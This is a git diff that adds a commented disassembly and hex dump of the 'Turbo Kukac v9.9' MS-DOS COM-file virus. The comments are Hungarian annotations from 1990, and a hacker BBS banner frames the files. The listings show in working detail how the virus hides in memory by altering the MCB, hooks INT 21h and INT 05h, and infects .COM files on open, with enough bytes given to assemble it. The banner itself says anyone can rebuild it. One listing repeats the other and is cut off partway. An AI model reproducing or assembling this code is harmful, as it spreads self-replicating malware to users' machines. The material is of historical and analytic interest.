+0EB0:027F 02E9 ADD CH,CL +0EB0:0281 1C00 SBB AL,00 +0EB0:0283 050101 ADD AX,0101 +0EB0:0286 EB12 JMP 029A +0EB0:0288 90 NOP +0EB0:0289 49 DEC CX +0EB0:028A 0001 ADD [BX+DI],AL +0EB0:028C DD0A ESC 29,[BP+SI][BP+SI] +0EB0:028E 0A0D OR CL,[DI] +0EB0:0290 9A6476206D CALL 6D20:7664 +0EB0:0295 69 DB 69 +0EB0:0296 6E DB 6E +0EB0:0297 64 DB 64 +0EB0:0298 65 DB 65 +0EB0:0299 6E DB 6E +0EB0:029A 206E61 AND [BP+61],CH +0EB0:029D 67 DB 67 +0EB0:029E 7974 JNS 0314 +0EB0:02A0 7564 JNZ 0306 +0EB0:02A2 A073A3 MOV AL,[A373] +0EB0:02A5 6E DB 6E +0EB0:02A6 61 DB 61 +0EB0:02A7 6B DB 6B +0EB0:02A8 2120 AND [BX+SI],SP +0EB0:02AA 54 PUSH SP +0EB0:02AB 7572 JNZ 031F +0EB0:02AD 62 DB 62 +0EB0:02AE 6F DB 6F +0EB0:02AF 204020 AND [BX+SI+20],AL +0EB0:02B2 2E CS: +0EB0:02B3 2E CS: +0EB0:02B4 2E CS: +0EB0:02B5 202E2E2E AND [2E2E],CH +0EB0:02B9 201A AND [BP+SI],BL +0EB0:02BB 0000 ADD [BX+SI],AL +0EB0:02BD 0000 ADD [BX+SI],AL +0EB0:02BF 005374 ADD [BP+DI+74],DL +0EB0:02C2 20E8 AND AL,CH +0EB0:02C4 4E DEC SI +0EB0:02C5 01E9 ADD CX,BP +0EB0:02C7 51 PUSH CX +0EB0:02C8 FF2EC606 JMP FAR [06C6] +0EB0:02CC 050006 ADD AX,0600 +0EB0:02CF 2E CS: +0EB0:02D0 C70609001000 MOV WORD PTR [0009],0010 +0EB0:02D6 EB7B JMP 0353 +0EB0:02D8 90 NOP +0EB0:02D9 2E CS: +0EB0:02DA C70609000A00 MOV WORD PTR [0009],000A +0EB0:02E0 EB71 JMP 0353 +0EB0:02E2 90 NOP +0EB0:02E3 2E CS: +0EB0:02E4 FE060600 INC BYTE PTR [0006] +0EB0:02E8 56 PUSH SI +0EB0:02E9 8BF3 MOV SI,BX +0EB0:02EB 83C302 ADD BX,+02 +0EB0:02EE 3E DS: +0EB0:02EF 8B7202 MOV SI,[BP+SI+02] +0EB0:02F2 2E CS: +0EB0:02F3 803E060000 CMP BYTE PTR [0006],00 +0EB0:02F8 750A JNZ 0304 +0EB0:02FA AC LODSB +0EB0:02FB 3C00 CMP AL,00 +0EB0:02FD 743B JZ 033A +0EB0:02FF E80F03 CALL 0611 + + + Megjegyzs: + + Nincs kros hatsa. Megoldsa kitn, hiszen mg egy system + info lekrse esetn sem kkisebb a DOS lltal ltott mem- + ria mret, mint a fizikai RAM mret! + +DUMP + +0EB0:0100 E8 00 00 90 5E 50 51 B8-21 35 CD 21 8C C0 3D 00 ....^PQ.!5.!..=. +0EB0:0110 40 72 20 83 EE 03 BA 86-01 03 F2 8B 1C 8B 4C 02 @r ...........L. +0EB0:0120 89 1E 00 01 89 0E 02 01-8C D8 8E C0 59 58 BB 00 ............YX.. +0EB0:0130 01 FF E3 A1 02 00 2D 00-08 8E C0 BF 00 01 83 EE ......-......... +0EB0:0140 03 B9 00 02 F3 A4 8C 06-F2 00 B9 55 01 89 0E F0 ...........U.... +0EB0:0150 00 FF 2E F0 00 8C C1 8C-D8 26 A3 8C 02 B8 00 01 .........&...... +0EB0:0160 26 A3 8A 02 8C C0 8E D8-B8 21 35 CD 21 2E 89 1E &........!5.!... +0EB0:0170 7C 02 8C C3 2E 89 1E 7E-02 B8 A5 01 8B D0 8B C1 |......~........ +0EB0:0180 8E D8 B8 21 25 CD 21 8B-16 86 02 8B 0E 88 02 A1 ...!%.!......... +0EB0:0190 8C 02 8E D8 89 16 00 01-89 0E 02 01 8E C0 59 58 ..............YX +0EB0:01A0 2E FF 2E 8A 02 90 80 FC-3D 74 03 E9 C0 00 1E 06 ........=t...... +0EB0:01B0 50 53 51 52 57 56 8B FA-8C DE 8E C6 B0 00 B9 32 PSQRWV.........2 +0EB0:01C0 00 FC F2 AE 83 EF 03 B8-4F 4D 26 3B 05 74 03 E9 ........OM&;.t.. +0EB0:01D0 94 00 B8 2E 43 26 3B 45-FE 74 03 E9 88 00 B4 3D ....C&;E.t.....= +0EB0:01E0 B0 02 E8 90 00 73 03 EB-7D 90 8B D8 B9 00 00 BA .....s..}....... +0EB0:01F0 00 00 B8 02 42 E8 7D 00-3D 00 FE 73 69 2D 03 00 ....B.}.=..si-.. +0EB0:0200 2E A3 81 02 B8 00 42 B9-00 00 BA 00 00 E8 65 00 ......B.......e. +0EB0:0210 B4 3F B9 04 00 BA 86 02-8C CF 8E DF E8 56 00 B0 .?...........V.. +0EB0:0220 05 3A 06 89 02 74 3F B8-00 42 B9 00 00 8B D1 E8 .:...t?..B...... +0EB0:0230 43 00 B0 E9 2E A2 80 02-B0 05 2E A2 83 02 B9 04 C............... +0EB0:0240 00 BA 80 02 0E 1F B4 40-E8 2A 00 B8 02 42 B9 00 .......@.*...B.. +0EB0:0250 00 8B D1 E8 1F 00 BA 00-01 B9 C0 01 B4 40 E8 14 .............@.. +0EB0:0260 00 B4 3E E8 0F 00 5E 5F-5A 59 5B 58 07 1F 90 2E ..>...^_ZY[X.... +0EB0:0270 FF 2E 7C 02 CF 9C 2E FF-1E 7C 02 C3 16 13 0C 02 ..|......|...... +0EB0:0280 E9 1C 00 05 01 01 EB 12-90 49 00 01 DD 0A 0A 0D .........I...... +0EB0:0290 9A 64 76 20 6D 69 6E 64-65 6E 20 6E 61 67 79 74 .dv minden nagyt +0EB0:02A0 75 64 A0 73 A3 6E 61 6B-21 20 54 75 72 62 6F 20 ud.s.nak! Turbo +0EB0:02B0 40 20 2E 2E 2E 20 2E 2E-2E 20 1A 00 00 00 00 00 @ ... ... ...... +0EB0:02C0 53 74 20 E8 4E 01 E9 51-FF 2E C6 06 05 00 06 2E St .N..Q........ +0EB0:02D0 C7 06 09 00 10 00 EB 7B-90 2E C7 06 09 00 0A 00 .......{........ +0EB0:02E0 EB 71 90 2E FE 06 06 00-56 8B F3 83 C3 02 3E 8B .q......V.....>. +0EB0:02F0 72 02 2E 80 3E 06 00 00-75 0A AC 3C 00 74 3B E8 r...>...u..<.t;. +0EB0:0300 0F . + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.turbo99.asm b/MSDOS/Virus.MSDOS.Unknown.turbo99.asm new file mode 100644 index 00000000..a288e8e7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.turbo99.asm @@ -0,0 +1,426 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +TURBO KUKAC v9.9 virus unassembled list: + `90.07.21. + +Magyarzat: Kvri Lszl + Tel.: (41) 21-822 07-13:20 mh. + 21-033 18:00- + + + +28F8:0100 E80000 CALL 0103 ;IP rtke az SI-be +28F8:0103 90 NOP ;ez lesz a bzis offset +28F8:0104 5E POP SI +28F8:0105 50 PUSH AX +28F8:0106 51 PUSH CX +28F8:0107 B021 MOV AL,21 +28F8:0109 B435 MOV AH,35 +28F8:010B CD21 INT 21 ;INT 21h cmnek lekr- + ;dezse +28F8:010D 8CC0 MOV AX,ES +28F8:010F 3D0040 CMP AX,4000 ;a memriban van ? +28F8:0112 7224 JB 0138 ;nincs! +28F8:0114 83EE03 SUB SI,+03 ;bzis offset -3 + ;(3 byte hosszu a JMP + ;+ az operandusa!) +28F8:0117 BAC102 MOV DX,02C1 +28F8:011A 81EA0001 SUB DX,0100 ;0100h offset levonsa + ;(COM file sajtossga!) +28F8:011E 03F2 ADD SI,DX +28F8:0120 8B1C MOV BX,[SI] ;JMP kdja + az operan- + ;dus fele +28F8:0122 8B4C02 MOV CX,[SI+02] ;JMP operandusa + 1 byte +28F8:0125 891E0001 MOV [0100],BX ;eredeti prg kezdet +28F8:0129 890E0201 MOV [0102],CX ;letrolsa +28F8:012D 8CD8 MOV AX,DS +28F8:012F 8EC0 MOV ES,AX ;ES=DS +28F8:0131 59 POP CX +28F8:0132 58 POP AX +28F8:0133 BB0001 MOV BX,0100 ;ugrs offset-je +28F8:0136 FFE3 JMP BX ;EREDETI PROGRAM VGRE- + ;HAJTSA + + ;HA MG NINCS A MEMRIBAN +28F8:0138 8CD8 MOV AX,DS ;sajt szegmense +28F8:013A 48 DEC AX ;sajt seg-1= MCB. seg. +28F8:013B 8ED8 MOV DS,AX ;DS=MCB. szegmense +28F8:013D A10300 MOV AX,[0003] ;DOS lltal a programnak + ;foglalt memriablokk + ;hossza +28F8:0140 2D4100 SUB AX,0041 ;virus hosszt levonja + ;belle (41*16 byte) +28F8:0143 A30300 MOV [0003],AX ;visszateszi igy a DOS + ;lltal ltott teljes + ;memria nagysga a prg. + ;kilpse utn (41*16 + ;byte-tal) kevesebb lesz + ;Hasonlan csinlja ezt + ;a YANKEE DOODLE is, s + ;ezzel azt ri el, hogy + ;semmilyen + ;System Storage Map + ;programmal nem mutat- + ;hat ki a virus jele- + ;lte a memriban! + ;A PCTOOLS system info + ;kimutatja, azaz csak + ;annyit ltni, hogy a + ;fizikai RAM mret 640K + ;s a DOS lltal ltott + ;az 639k byte! Igy k- + ;vetkeztetni lehet... +28F8:0146 8CC8 MOV AX,CS +28F8:0148 8ED8 MOV DS,AX ;DS=CS +28F8:014A A10200 MOV AX,[0002] ;PSP-ben a RAM tetej- + ;nek a paragrafuscme +28F8:014D 2D0008 SUB AX,0800 +28F8:0150 8EC0 MOV ES,AX ;virus j szegmense +28F8:0152 BF0001 MOV DI,0100 +28F8:0155 83EE03 SUB SI,+03 +28F8:0158 B90002 MOV CX,0200 ;virus hossza +28F8:015B F3 REPZ +28F8:015C A4 MOVSB ;virus msolsa az j + ;szegmensbe +28F8:015D 8C06C702 MOV [02C7],ES ;j szegmens trolsa +28F8:0161 B96C01 MOV CX,016C ;belpsi pont +28F8:0164 890EC502 MOV [02C5],CX ;trolsa +28F8:0168 FF2EC502 JMP FAR [02C5] ;ugrs az j szegmens + ;01c6 offset-re + ;UJ SZEGMENSBEN A BELPSI PONT +28F8:016C 8CC1 MOV CX,ES +28F8:016E 8CD8 MOV AX,DS ;ahonnan msolta magt +28F8:0170 26 ES: +28F8:0171 A3CB02 MOV [02CB],AX ;RGI PRG. segment cm +28F8:0174 B80001 MOV AX,0100 +28F8:0177 26 ES: +28F8:0178 A3C902 MOV [02C9],AX ;0100h offset trolsa +28F8:017B 8CC0 MOV AX,ES +28F8:017D 8ED8 MOV DS,AX +28F8:017F BAC701 MOV DX,01C7 ;INT 05 - HARD COPY j + ;offset-je +28F8:0182 B005 MOV AL,05 +28F8:0184 B425 MOV AH,25 +28F8:0186 CD21 INT 21 ;INT 05 ellopsa +28F8:0188 B435 MOV AH,35 +28F8:018A B021 MOV AL,21 +28F8:018C CD21 INT 21 ;INT 21h cm lekrdez- + ;se +28F8:018E 2E CS: +28F8:018F 891EB702 MOV [02B7],BX ;INT 05h offset (rgi) +28F8:0193 8CC3 MOV BX,ES +28F8:0195 2E CS: +28F8:0196 891EB902 MOV [02B9],BX ;INT 05h segment (rgi) +28F8:019A B8D901 MOV AX,01D9 ;j INT 21h offset cm +28F8:019D 8BD0 MOV DX,AX +28F8:019F 8BC1 MOV AX,CX +28F8:01A1 8ED8 MOV DS,AX +28F8:01A3 B021 MOV AL,21 +28F8:01A5 B425 MOV AH,25 +28F8:01A7 CD21 INT 21 ;INT 21h ellopsa +28F8:01A9 8B16C102 MOV DX,[02C1] ;EREDETI JMP + AZ +28F8:01AD 8B0EC302 MOV CX,[02C3] ;OPERANDUSA!!! +28F8:01B1 A1CB02 MOV AX,[02CB] ;EREDETI PRG. SEG!!! +28F8:01B4 8ED8 MOV DS,AX +28F8:01B6 89160001 MOV [0100],DX ;eredeti JMP kdja +28F8:01BA 890E0201 MOV [0102],CX ;s operandusa +28F8:01BE 8EC0 MOV ES,AX +28F8:01C0 59 POP CX +28F8:01C1 58 POP AX +28F8:01C2 2E CS: +28F8:01C3 FF2EC902 JMP FAR [02C9] ;EREDETI PROGRAM FUTTA- + ;TSA! + ;j INT 05 - HARD COPY rutin +28F8:01C7 90 NOP +28F8:01C8 50 PUSH AX +28F8:01C9 1E PUSH DS +28F8:01CA 52 PUSH DX +28F8:01CB 8CC8 MOV AX,CS +28F8:01CD 8ED8 MOV DS,AX + ;VGTELEN CIKLUS! +28F8:01CF BACE02 MOV DX,02CE ;szveg kezdete + ;Turbo Kukac v9.9 +28F8:01D2 B409 MOV AH,09 ;print string +28F8:01D4 E8D900 CALL 02B0 ;rgi INT 21h hivsa +28F8:01D7 EBF6 JMP 01CF ;jra! + + ;j INT 21h rutin +28F8:01D9 90 NOP +28F8:01DA 80FC3D CMP AH,3D ;file nyitsa alfunkci? +28F8:01DD 7403 JZ 01E2 ;igen +28F8:01DF E9C700 JMP 02A9 ;nem ugrsa az eredeti + ;INT 21h-ra +28F8:01E2 90 NOP +28F8:01E3 1E PUSH DS +28F8:01E4 06 PUSH ES +28F8:01E5 50 PUSH AX +28F8:01E6 53 PUSH BX +28F8:01E7 51 PUSH CX +28F8:01E8 52 PUSH DX +28F8:01E9 57 PUSH DI +28F8:01EA 56 PUSH SI + + ;File kiterjeszts ellenrzse + +28F8:01EB 8BFA MOV DI,DX ;file PATH kezdete +28F8:01ED 8CDE MOV SI,DS +28F8:01EF 8EC6 MOV ES,SI ;ES=DS (igy a file PATH + ;tvtele!) +28F8:01F1 B000 MOV AL,00 ;PATH lezr nulla +28F8:01F3 B93200 MOV CX,0032 ;file secifikci hossza +28F8:01F6 FC CLD ;elre +28F8:01F7 F2 REPNZ +28F8:01F8 AE SCASB ;PATH lezr 0 byte ke- + ;resse +28F8:01F9 83EF03 SUB DI,+03 ;-3 igy a kiterjeszts + ;kezdet+1 pozicira mu- + ;tat +28F8:01FC B84F4D MOV AX,4D4F ;'OM' AX-be +28F8:01FF 26 ES: +28F8:0200 3B05 CMP AX,[DI] ; 'OM' a vge ? +28F8:0202 7403 JZ 0207 ;igen valszinleg COM + ;file +28F8:0204 E99A00 JMP 02A1 ;nem COM ugrs az erede- + ;ti INT 21h-ra +28F8:0207 B82E43 MOV AX,432E ;'.C' AX-be +28F8:020A 26 ES: +28F8:020B 3B45FE CMP AX,[DI-02] ; '.C' ? +28F8:020E 7403 JZ 0213 ;biztos hogy COM file! +28F8:0210 E98E00 JMP 02A1 ;nem COM ugrs az erede- + ;ti INT 21h-ra + ;File nyitsa + +28F8:0213 B43D MOV AH,3D ;file nyits +28F8:0215 B002 MOV AL,02 ;rs/olvass +28F8:0217 E89600 CALL 02B0 ;INT 21h hivsa +28F8:021A 7303 JNB 021F ;ha nincs hiba +28F8:021C E98200 JMP 02A1 ;hiba esetn ugrs az + ;eredeti INT 21h-ra +28F8:021F 8BD8 MOV BX,AX ;file kezel + + ;File mret ellenrzs + +28F8:0221 B90000 MOV CX,0000 +28F8:0224 BA0000 MOV DX,0000 +28F8:0227 B002 MOV AL,02 ;file vgre +28F8:0229 B442 MOV AH,42 ;file pointer mozgatsa +28F8:022B E88200 CALL 02B0 ;INT 21h hivsa +28F8:022E 3D00FE CMP AX,FE00 +28F8:0231 736E JNB 02A1 ;ha nem nagyobb a file + ;65024 byte-nl +28F8:0233 2D0300 SUB AX,0003 ;JMP+op hossza + + ;Fertzend file eredeti 4 byte jnak + ;beolvassa + +28F8:0236 2E CS: +28F8:0237 A3BE02 MOV [02BE],AX ;letrolja +28F8:023A B442 MOV AH,42 ;file pointer mozgatsa +28F8:023C B000 MOV AL,00 ;file elejre +28F8:023E B90000 MOV CX,0000 +28F8:0241 BA0000 MOV DX,0000 +28F8:0244 E86900 CALL 02B0 ;INT 21h hivsa +28F8:0247 B43F MOV AH,3F ;olvass file-bl +28F8:0249 B90400 MOV CX,0004 ;4 byte +28F8:024C BAC102 MOV DX,02C1 ;ide tegye +28F8:024F 8CCF MOV DI,CS +28F8:0251 8EDF MOV DS,DI ;DS=CS +28F8:0253 E85A00 CALL 02B0 ;INT 21h hivsa +28F8:0256 B005 MOV AL,05 +28F8:0258 3A06C402 CMP AL,[02C4] ;utols byte=5 ? +28F8:025C 7443 JZ 02A1 ;igen, ugrs az eredeti + ;INT 21h -ra + + ;Fertzend file-ba a virusra + ;mutat JMP+op. kirsa (4 byte) + +28F8:025E B442 MOV AH,42 ;file pointer mozgatsa +28F8:0260 B000 MOV AL,00 ;file elejre +28F8:0262 B90000 MOV CX,0000 +28F8:0265 8BD1 MOV DX,CX +28F8:0267 E84600 CALL 02B0 ;INT 21h hivsa +28F8:026A B0E9 MOV AL,E9 ;JMP kdja +28F8:026C 2E CS: +28F8:026D A2BD02 MOV [02BD],AL ;letrolja +28F8:0270 B005 MOV AL,05 +28F8:0272 2E CS: +28F8:0273 A2C002 MOV [02C0],AL +28F8:0276 B90400 MOV CX,0004 ;4 byte +28F8:0279 BABD02 MOV DX,02BD ;JMP + op. kezdete +28F8:027C 8CC8 MOV AX,CS +28F8:027E 8ED8 MOV DS,AX +28F8:0280 B440 MOV AH,40 ;kirs file-ba +28F8:0282 E82B00 CALL 02B0 ;INT 21h hivsa + + ;Program megfertzse 0200h byte kirsa + ;azaz a virus mgmsolsa + +28F8:0285 B442 MOV AH,42 ;file pointer mozgatsa +28F8:0287 B002 MOV AL,02 ;file vgre +28F8:0289 B90000 MOV CX,0000 +28F8:028C 8BD1 MOV DX,CX +28F8:028E E81F00 CALL 02B0 ;INT 21h hivsa +28F8:0291 BA0001 MOV DX,0100 ;0100h ofset-tl +28F8:0294 B90002 MOV CX,0200 ;0200h byte virus hossza +28F8:0297 B440 MOV AH,40 ;kirs file-ba +28F8:0299 E81400 CALL 02B0 ;INT 21h hivsa +28F8:029C B43E MOV AH,3E ;file zrsa +28F8:029E E80F00 CALL 02B0 ;INT 21h hivsa +28F8:02A1 5E POP SI +28F8:02A2 5F POP DI +28F8:02A3 5A POP DX +28F8:02A4 59 POP CX +28F8:02A5 5B POP BX +28F8:02A6 58 POP AX +28F8:02A7 07 POP ES +28F8:02A8 1F POP DS + +28F8:02A9 90 NOP +28F8:02AA 2E CS: +28F8:02AB FF2EB702 JMP FAR [02B7] ;eredeti INT 21h-ra +28F8:02AF CF IRET + ;Eredeti INT 21h hivsa +28F8:02B0 9C PUSHF ;elmenti mivel az IRET + ;visszamenti a flag-eket +28F8:02B1 2E CS: +28F8:02B2 FF1EB702 CALL FAR [02B7] ;eredeti INT 21h hivsa +28F8:02B6 C3 RET + +28F8:02B7 16 PUSH SS +28F8:02B8 130C ADC CX,[SI] +28F8:02BA 0202 ADD AL,[BP+SI] +28F8:02BC 00E9 ADD CL,CH +28F8:02BE 06 PUSH ES +28F8:02BF 06 PUSH ES +28F8:02C0 05E906 ADD AX,06E9 +28F8:02C3 0405 ADD AL,05 +28F8:02C5 0100 ADD [BX+SI],AX +28F8:02C7 0000 ADD [BX+SI],AL +28F8:02C9 0001 ADD [BX+DI],AL +28F8:02CB F0 LOCK +28F8:02CC 0901 OR [BX+DI],AX +28F8:02CE 54 PUSH SP +28F8:02CF 7572 JNZ 0343 +28F8:02D1 62 DB 62 +28F8:02D2 6F DB 6F +28F8:02D3 204B75 AND [BP+DI+75],CL +28F8:02D6 6B DB 6B +28F8:02D7 61 DB 61 +28F8:02D8 63 DB 63 +28F8:02D9 2039 AND [BX+DI],BH +28F8:02DB 2E CS: +28F8:02DC 3920 CMP [BX+SI],SP +28F8:02DE 2020 AND [BX+SI],AH +28F8:02E0 2020 AND [BX+SI],AH +28F8:02E2 2024 AND [SI],AH +28F8:02E4 0000 ADD [BX+SI],AL + +28F8:02FC 0000 ADD [BX+SI],AL +28F8:02FE FA CLI +28F8:02FF 00C7 ADD BH,AL + +Megjegyzs: + + Nagyon primitv virus, de megvan a maga zsenialitsa, kt legyet + t egy csapsra, pl COPY parancs esetn megnyit egy com file-t,s + ha a virus a memriban van, akkor mg a msoland file-t megfer- + tzi, s a COPY mr a fertztt file-t msolja! Nem igazn kr- + tkony vrus, pusztn mindentt ott akar lenni, s nehezteni a + felhasznl(k) munkjt! Mrete nagyon kicsi, mindssze 512 byte! + Hinyoznak a vrusbl az (tapasztalataim szerint) eddigi virusok- + ban fellelhet ellenrzsek, gondolok itt arra, hogy ha megtrtnik + egy file-ba (hoz) val kirs nem ellenrzi a program hogy valban + kirta-e azt az X byte-ot. Tovbb mikor rezidess (nem {hivatalo- + san} bejegyzetten) teszi magt nem mdostja az MCB. 13. byte-jn + lv RAM tetejnek a paragrafus cmtt a sajt maga lltal lefog- + lalt mrettel (kivons!), mint PL. a Yankee Doodle! A Yankee mg + azt is megnzi, hogy amit meg akar fertzni az az utols mem. + blokkban van-e, br abban kell lennie, mert a DOS egy programnak + odaadja a teljes szabad memrit, ami van... + + +DUMP: + +28F8:0100 E8 00 00 90 5E 50 51 B0-21 B4 35 CD 21 8C C0 3D ....^PQ.!.5.!..= +28F8:0110 00 40 72 24 83 EE 03 BA-C1 02 81 EA 00 01 03 F2 .@r$............ +28F8:0120 8B 1C 8B 4C 02 89 1E 00-01 89 0E 02 01 8C D8 8E ...L............ +28F8:0130 C0 59 58 BB 00 01 FF E3-8C D8 48 8E D8 A1 03 00 .YX.......H..... +28F8:0140 2D 41 00 A3 03 00 8C C8-8E D8 A1 02 00 2D 00 08 -A...........-.. +28F8:0150 8E C0 BF 00 01 83 EE 03-B9 00 02 F3 A4 8C 06 C7 ................ +28F8:0160 02 B9 6C 01 89 0E C5 02-FF 2E C5 02 8C C1 8C D8 ..l............. +28F8:0170 26 A3 CB 02 B8 00 01 26-A3 C9 02 8C C0 8E D8 BA &......&........ +28F8:0180 C7 01 B0 05 B4 25 CD 21-B4 35 B0 21 CD 21 2E 89 .....%.!.5.!.!.. +28F8:0190 1E B7 02 8C C3 2E 89 1E-B9 02 B8 D9 01 8B D0 8B ................ +28F8:01A0 C1 8E D8 B0 21 B4 25 CD-21 8B 16 C1 02 8B 0E C3 ....!.%.!....... +28F8:01B0 02 A1 CB 02 8E D8 89 16-00 01 89 0E 02 01 8E C0 ................ +28F8:01C0 59 58 2E FF 2E C9 02 90-50 1E 52 8C C8 8E D8 BA YX......P.R..... +28F8:01D0 CE 02 B4 09 E8 D9 00 EB-F6 90 80 FC 3D 74 03 E9 ............=t.. +28F8:01E0 C7 00 90 1E 06 50 53 51-52 57 56 8B FA 8C DE 8E .....PSQRWV..... +28F8:01F0 C6 B0 00 B9 32 00 FC F2-AE 83 EF 03 B8 4F 4D 26 ....2........OM& +28F8:0200 3B 05 74 03 E9 9A 00 B8-2E 43 26 3B 45 FE 74 03 ;.t......C&;E.t. +28F8:0210 E9 8E 00 B4 3D B0 02 E8-96 00 73 03 E9 82 00 8B ....=.....s..... +28F8:0220 D8 B9 00 00 BA 00 00 B0-02 B4 42 E8 82 00 3D 00 ..........B...=. +28F8:0230 FE 73 6E 2D 03 00 2E A3-BE 02 B4 42 B0 00 B9 00 .sn-.......B.... +28F8:0240 00 BA 00 00 E8 69 00 B4-3F B9 04 00 BA C1 02 8C .....i..?....... +28F8:0250 CF 8E DF E8 5A 00 B0 05-3A 06 C4 02 74 43 B4 42 ....Z...:...tC.B +28F8:0260 B0 00 B9 00 00 8B D1 E8-46 00 B0 E9 2E A2 BD 02 ........F....... +28F8:0270 B0 05 2E A2 C0 02 B9 04-00 BA BD 02 8C C8 8E D8 ................ +28F8:0280 B4 40 E8 2B 00 B4 42 B0-02 B9 00 00 8B D1 E8 1F .@.+..B......... +28F8:0290 00 BA 00 01 B9 00 02 B4-40 E8 14 00 B4 3E E8 0F ........@....>.. +28F8:02A0 00 5E 5F 5A 59 5B 58 07-1F 90 2E FF 2E B7 02 CF .^_ZY[X......... +28F8:02B0 9C 2E FF 1E B7 02 C3 16-13 0C 02 02 00 E9 06 06 ................ +28F8:02C0 05 E9 06 04 05 01 00 00-00 00 01 F0 09 01 .............. + + ;Kirand szveg kezdete +28F8:02C0 54 75 Tu +28F8:02D0 72 62 6F 20 4B 75 6B 61-63 20 39 2E 39 20 20 20 rbo Kukac 9.9 +28F8:02E0 20 20 20 24 $ + +28F8:02E0 00 00 00 00-00 00 00 00 00 00 00 00 ............ +28F8:02F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 FA 00 ................ +28F8:0300 C7 . + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; diff --git a/MSDOS/Virus.MSDOS.Unknown.turbo99.lst b/MSDOS/Virus.MSDOS.Unknown.turbo99.lst new file mode 100644 index 00000000..a288e8e7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.turbo99.lst @@ -0,0 +1,426 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +TURBO KUKAC v9.9 virus unassembled list: + `90.07.21. + +Magyarzat: Kvri Lszl + Tel.: (41) 21-822 07-13:20 mh. + 21-033 18:00- + + + +28F8:0100 E80000 CALL 0103 ;IP rtke az SI-be +28F8:0103 90 NOP ;ez lesz a bzis offset +28F8:0104 5E POP SI +28F8:0105 50 PUSH AX +28F8:0106 51 PUSH CX +28F8:0107 B021 MOV AL,21 +28F8:0109 B435 MOV AH,35 +28F8:010B CD21 INT 21 ;INT 21h cmnek lekr- + ;dezse +28F8:010D 8CC0 MOV AX,ES +28F8:010F 3D0040 CMP AX,4000 ;a memriban van ? +28F8:0112 7224 JB 0138 ;nincs! +28F8:0114 83EE03 SUB SI,+03 ;bzis offset -3 + ;(3 byte hosszu a JMP + ;+ az operandusa!) +28F8:0117 BAC102 MOV DX,02C1 +28F8:011A 81EA0001 SUB DX,0100 ;0100h offset levonsa + ;(COM file sajtossga!) +28F8:011E 03F2 ADD SI,DX +28F8:0120 8B1C MOV BX,[SI] ;JMP kdja + az operan- + ;dus fele +28F8:0122 8B4C02 MOV CX,[SI+02] ;JMP operandusa + 1 byte +28F8:0125 891E0001 MOV [0100],BX ;eredeti prg kezdet +28F8:0129 890E0201 MOV [0102],CX ;letrolsa +28F8:012D 8CD8 MOV AX,DS +28F8:012F 8EC0 MOV ES,AX ;ES=DS +28F8:0131 59 POP CX +28F8:0132 58 POP AX +28F8:0133 BB0001 MOV BX,0100 ;ugrs offset-je +28F8:0136 FFE3 JMP BX ;EREDETI PROGRAM VGRE- + ;HAJTSA + + ;HA MG NINCS A MEMRIBAN +28F8:0138 8CD8 MOV AX,DS ;sajt szegmense +28F8:013A 48 DEC AX ;sajt seg-1= MCB. seg. +28F8:013B 8ED8 MOV DS,AX ;DS=MCB. szegmense +28F8:013D A10300 MOV AX,[0003] ;DOS lltal a programnak + ;foglalt memriablokk + ;hossza +28F8:0140 2D4100 SUB AX,0041 ;virus hosszt levonja + ;belle (41*16 byte) +28F8:0143 A30300 MOV [0003],AX ;visszateszi igy a DOS + ;lltal ltott teljes + ;memria nagysga a prg. + ;kilpse utn (41*16 + ;byte-tal) kevesebb lesz + ;Hasonlan csinlja ezt + ;a YANKEE DOODLE is, s + ;ezzel azt ri el, hogy + ;semmilyen + ;System Storage Map + ;programmal nem mutat- + ;hat ki a virus jele- + ;lte a memriban! + ;A PCTOOLS system info + ;kimutatja, azaz csak + ;annyit ltni, hogy a + ;fizikai RAM mret 640K + ;s a DOS lltal ltott + ;az 639k byte! Igy k- + ;vetkeztetni lehet... 